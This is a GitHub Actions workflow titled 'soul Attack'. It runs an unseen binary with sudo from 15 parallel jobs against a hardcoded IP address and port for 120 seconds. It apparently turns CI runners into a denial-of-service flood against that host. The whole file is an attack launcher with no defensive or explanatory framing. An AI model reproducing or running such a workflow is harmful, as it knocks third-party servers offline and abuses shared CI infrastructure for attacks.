name: soul Attack
on: [push]
jobs:
  attack:
    runs-on: ubuntu-22.04
    strategy:
      fail-fast: false
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul 52.140.45.136 27897 120 || true
